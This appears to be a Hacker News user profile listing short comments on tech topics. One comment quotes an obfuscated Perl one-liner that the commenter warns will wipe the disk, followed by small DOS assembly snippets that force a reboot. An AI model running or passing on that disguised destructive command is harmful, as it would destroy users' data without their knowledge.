HN user

dim13

396 karma

/dev/go

Posts1
Comments66
View on HN
Fahrplan – 39C3 7 months ago

It is no longer the same. It went from somewhat exclusive dining experience to full blown nuclear junk food chain vibe.

I've stopped attending it about 10 years ago. I rather prefer to watch some few interesting topics online, and skip all the wanna-be political junk.

Size of Life 7 months ago

Also: Banana - Although not technically living, it does make for a good size comparison.

Claude outage 9 months ago

I've never started. ¯\_(ツ)_/¯ And also not going to. I see enough crap, colleges produce, to never touch this pile of dung.

macOS Tahoe 10 months ago

Read most of the comment, was hesitated. Then thought "it can't be that bad". Ok, it is that bad. I absolutely hate extra round corners and extra margin in the windows. Sigh.

No Hello 1 year ago

I usually take it even a step further by skipping useless "hello".

Instead of "Hello, did you notice, that db is down? Can you check it please?"

Just terse "DB seems to be down. Please check it."

[dead] 1 year ago

Hilarious, how an old joke from 2003 is still relevant today.

Please, please, please don't execute it. It will try to wipe you disk.

    cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Origin: https://www.linux.org.ru/forum/development/392747

Some more:

Quick'n'dirty:

    .model small
    .code
     org 100h
    start:
     int 19h                 ; Bootstrap loader
    end start
More "correct":
    .model small
    .code
     org 100h
    start:
     db 0EAh                 ; Jump to Power On Self Test - Cold Boot
     dw 0,0FFFFh
    end start
Even more "correct":
    .model small
    .code
     org 100h
    start:
     mov ah,0Dh
     int 21h                 ; DOS Services  ah=function 0Dh
                             ;  flush disk buffers to disk
     sti                     ; Enable interrupts
     hlt                     ; Halt processor
     mov al,0FEh
     out 64h,al              ; port 64h, kybd cntrlr functn
                             ;  al = 0FEh, pulse CPU reset
    end start

with zero ads the internet would be a smaller, darker place

Yes, please!

Once a while I turn off ad-blocker to remind myself how bad it got. And OMG! It is bad, Bad, BAD! Unusable. Sometimes is less more.

Let us play a recursive game. Will it loop?

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Blah blah blah, fancy Latin gibberish. Look at me, I'm so intellectual! Just kidding, this is meaningless filler text. Move along, nothing to see here.

Meaningless filler. Keep walking.

Move it, chump.

Get lost, loser.

Bye, champ.

Later.

Bye.

Later.

Bye.

That's also, what's article is about.

This is one reason why hard-buttons are so effective in old-school cars. They all use these same standard icons so it’s easier for new users to scan across them and find the one you want without any training.